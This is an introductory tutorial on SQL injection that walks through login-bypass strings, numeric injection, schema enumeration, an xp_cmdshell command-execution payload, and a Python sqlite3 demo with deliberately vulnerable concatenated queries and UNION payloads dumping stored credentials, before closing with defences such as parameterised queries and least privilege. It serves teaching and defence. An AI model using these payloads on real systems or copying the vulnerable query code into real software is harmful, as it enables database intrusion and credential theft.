A simple introduction to SQL injection

This technique matters to attackers and, for the same reason, to everyone who has to defend systems against them: administrators, and website and web application programmers, especially those writing custom code. There are many attack methods, but SQL injection is consistently among the most common ways web applications get compromised.

SQL injection is an application vulnerability that arises when user input is passed into a database query without being sanitized or verified. The application does not reason about the query it intends to run; it simply builds an SQL string out of whatever the user typed. An attacker can therefore supply input that is syntactically legal SQL but carries its own clauses or statements, disguised so that the application never notices, and the database ends up doing what the attacker wants, whether that is reading data it should never expose or writing to, and damaging, the databases behind the site.

Web applications written in ASP, JSP, PHP, CGI or any other language are vulnerable whenever they build queries this way. An attacker needs nothing more than access to port 80, a web browser, a good knowledge of SQL and of the target database, the ability to interpret database error messages, and some creativity to steal sensitive information from almost any organisation. That makes it a serious risk for anyone running a database-backed site.

So it is the responsibility of administrators and programmers to be aware of the technique and of the ways it can be exploited. Servers must be kept patched, and every user input must be sanitized and verified before it is sent to the database. Learning the tricks of the trade of web attacks, and keeping up with new ones through ethical hacking practice, keeps defenders a step ahead of attackers.

There are sophisticated automated scanners, both commercial and open source, that crawl websites and applications and use heuristics to test for SQL injection and many other classes of attack. They cover most known techniques across the common databases, languages and combinations of the two, but they only find what they have been taught to look for, so they complement manual testing rather than replace it.

The most attack-prone entry points are user input forms: login, search, feedback and the like. The HTML source shows the FORM tag, the POST method and any hidden fields; other parameters show up directly in the URL.

If you cannot find pages that take input, look for a URL that takes parameters, such as:
http://test/index.asp?id=10

To test for the vulnerability, start with the single-quote trick: put a single quote into the login field, the password field or even the URL, followed by a condition that is always true and a comment marker:
Login: me' or 1=1--
Password: me' or 1=1--
URL - http://test/index.asp?id=me' or 1=1--
For a numeric parameter such as id the quote is not even needed; 10 or 1=1 has the same effect. The possible results are a successful login or some useful values, expected or unexpected application errors, server errors, or ODBC error messages. Each of these tells the attacker something, and from them usernames, passwords, tables and columns with their values can be worked out.

For a hidden field, save the HTML source to disk, edit the hidden field's value (and the form's action URL if needed) to carry the payload, then open the edited page and submit the form.

A string like me' or 1=1-- can bypass a login and, depending on how the application builds its queries, return extra rows or even the whole table: the quote closes the string literal, or 1=1 makes the WHERE clause always true, and -- comments out whatever the application appended after the input, including the password check.

The first step is to obtain some usernames and passwords; if you find the administrator's, bingo. The second is to find table and column names. The names of the system tables and views are already known, since they are standard.

Remote command execution is even feasible on SQL Server through extended stored procedures like master..xp_cmdshell, provided the account the application connects with is allowed to run it (it needs sysadmin rights, and on SQL Server 2005 and later the procedure is disabled by default):
'; exec master..xp_cmdshell 'ping 10.10.1.2'--

To see the output of an injected query it is possible to use sp_makewebtask, which writes query results to an HTML file. It is also possible to provoke ODBC errors with crafted requests and read key information about the system from the error text. INFORMATION_SCHEMA.TABLES is the system view that lists the tables, with the name in its TABLE_NAME column.

In the same way, INFORMATION_SCHEMA.COLUMNS lists the columns of each table (COLUMN_NAME alongside TABLE_NAME). With table and column names in hand almost anything can be read, starting with the first user's username and password.

It is also possible to inject into numeric as well as string values, and to modify the database contents through UPDATE or INSERT statements.
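Here is what the attacks above look like against a running database: the single-quote login bypass, the INFORMATION_SCHEMA-style enumeration of tables and columns, and injection into a numeric parameter. This is an added example, not code from the original article. It uses Python's built-in sqlite3 with a constructed in-memory users/products schema (the table and column names are assumptions), and SQLite's sqlite_master catalogue stands in for SQL Server's INFORMATION_SCHEMA views. The three vulnerable functions build their SQL by string concatenation, exactly as the article describes.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's backend.
    Passwords are stored in clear only to keep the example short."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'bob', 'hunter2');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (10, 'widget'), (11, 'gadget');
    """)
    return con


def login_vulnerable(con, username, password):
    """Login check that splices the user's input straight into the SQL text.
    Returns the matched username, or None when the credentials do not match."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def search_vulnerable(con, term):
    """Product search with the same string-concatenation flaw."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [r[0] for r in con.execute(sql)]


def product_by_id_vulnerable(con, id_param):
    """Numeric id taken from the URL (index.asp?id=10) and concatenated
    without quotes, so no quote character is needed to break out."""
    sql = "SELECT name FROM products WHERE id = " + id_param
    return [r[0] for r in con.execute(sql)]


# The article's single-quote trick: the quote closes the string literal,
# "or 1=1" makes the WHERE clause always true, and "--" comments out the
# rest of the query, including the password check.
LOGIN_BYPASS = "me' or 1=1--"

# Schema enumeration. SQL Server would use INFORMATION_SCHEMA.TABLES and
# INFORMATION_SCHEMA.COLUMNS; SQLite's equivalent catalogue is sqlite_master,
# whose "sql" column holds the CREATE statement and therefore the column names.
LIST_TABLES = "' UNION SELECT name FROM sqlite_master WHERE type='table'--"
LIST_COLUMNS = "' UNION SELECT sql FROM sqlite_master WHERE name='users'--"

# Once table and column names are known, pull the credentials themselves.
DUMP_USERS = "' UNION SELECT username || ':' || password FROM users--"

# Numeric context: no quote at all, so stripping quotes would not stop it.
ALL_IDS = "10 or 1=1"


if __name__ == "__main__":
    con = make_db()
    print(login_vulnerable(con, LOGIN_BYPASS, "whatever"))   # admin
    print(search_vulnerable(con, LIST_TABLES))               # includes users, products
    print(search_vulnerable(con, LIST_COLUMNS))              # includes CREATE TABLE users (...)
    print(search_vulnerable(con, DUMP_USERS))                # includes admin:S3cret!
    print(product_by_id_vulnerable(con, ALL_IDS))            # every product, not just id 10
```

The bypass returns "admin" rather than "me" because the injected WHERE clause matches every row and the login code takes the first one, which is the article's "first user's username". The UNION payloads work here because each injected SELECT returns the same number of columns as the original query; against a real target the attacker finds that number by trial and from the error messages the article mentions.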

All of this can be prevented by validating every input from users, every parameter from URLs and every value from cookies. Filtering out characters such as single quote, double quote, semicolon, slash, backslash and extended characters like NUL, newline and carriage return reduces the attack surface, but a blacklist of characters is easy to get wrong and does nothing for inputs that never needed a quote. The reliable defence is to stop building SQL strings from input at all and use parameterised queries (prepared statements), so the database receives the query text and the values separately and input can never change the query's structure.

For numeric values, check with ISNUMERIC or, better, convert the value to an integer before it goes anywhere near the SQL statement, and reject anything that does not convert (ISNUMERIC also accepts strings such as '$' or '1e3', so an explicit integer conversion is the safer check).

Disable or remove extended stored procedures like master..xp_cmdshell, xp_sendmail, xp_startmail and sp_makewebtask if they are not being used.

Change the SQL Server service to start up and run under a low-privilege account (Security tab of the server properties), and have the application connect with a database login that holds only the permissions it needs rather than sa.
